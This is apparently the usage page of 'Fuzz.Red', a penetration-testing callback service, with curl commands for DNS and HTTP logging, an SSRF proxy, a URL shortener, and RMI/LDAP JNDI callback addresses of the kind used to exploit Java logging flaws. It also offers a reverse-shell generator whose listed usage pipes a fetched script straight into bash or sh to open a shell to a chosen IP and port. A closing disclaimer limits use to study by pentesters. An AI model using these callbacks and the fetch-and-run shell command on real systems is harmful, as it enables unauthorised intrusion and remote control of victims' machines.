$$$$$$\ $$\ $$\ $$\ $$ __$$\ $$ | $$ | $$ | $$ / $$ |$$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$$$$$\ $$$$$$\ $$$$$$$$ |$$ |$$ __$$\ $$ __$$\ \____$$\ $$ | $$ __$$\ $$ __$$\ $$ __$$ |$$ |$$ / $$ |$$ | $$ | $$$$$$$ |$$ | $$ / $$ |$$ / $$ | $$ | $$ |$$ |$$ | $$ |$$ | $$ |$$ __$$ |$$ | $$ | $$ |$$ | $$ | $$ | $$ |$$ |$$$$$$$ |$$ | $$ |\$$$$$$$ |$$$$$$$$\\$$$$$$ |\$$$$$$$ | \__| \__|\__|$$ ____/ \__| \__| \_______|\________|\______/ \____$$ | $$ | $$\ $$ | $$ | By:Alphabug \$$$$$$ | \__| Version:1.0.0.Releases \______/ # Welcome to Fuzz.Red # Usage: 1.Get Token and The randomly named subdomain (Expires:1 Day) $ curl fuzz.red/get => {"key":"63d755be-9683-40a9-91fb-b85890155872","subdomain":"oz4e.fuzz.red","rmi":"rmi://jndi.fuzz.red:5/oz4e/","ldap":"ldap://jndi.fuzz.red:5/oz4e/Alphabug"} 2.Get Log $ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872" => {"code":200,"data":[]} ------------------------------------------ # DNSLOG ping -c 1 oz4e.fuzz.red # HTTPLOG curl oz4e.fuzz.red -d "abc" # SSRF $ curl -L fuzz.red/ssrf/www.baidu.com/ => ...(www.baidu.com page)... # 短链接 $ curl fuzz.red -X POST -d "url=http://www.baidu.com" => http://fuzz.red/n7rs # 自定义反弹shell $ curl fuzz.red/sh4ll/ip:port server => $ curl fuzz.red/sh4ll/1.2.3.4:1234 | bash or $ curl fuzz.red/sh4ll/1.2.3.4:1234 | sh # RMI or LDAP => 例如:子域名=oz4e.fuzz.red,text=Alphabug => rmi://jndi.fuzz.red:5/oz4e/Alphabug | ldap://jndi.fuzz.red:5/oz4e/Alphabug # 查看Log $ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872" | python -m json.tool => { "Code": 200, "Data": [ { "ip": "1.2.3.4:41584", "reqbody": "Alphabug", "subdomain": "oz4e.fuzz.red.", "time": "2022-01-16 03:40:03 -0500 EST", "type": "ldap" } ] } => 免责声明: 当您使用fuzz.red项目时,默认您已经同意以下条款: 本项目仅供网站管理人员、渗透测试人员学习与交流,任何使用本项目进行的一切未授权攻击行为与本人无关,使用者必须履行http://www.gnu.org/licenses/gpl-2.0.html 协议与准则。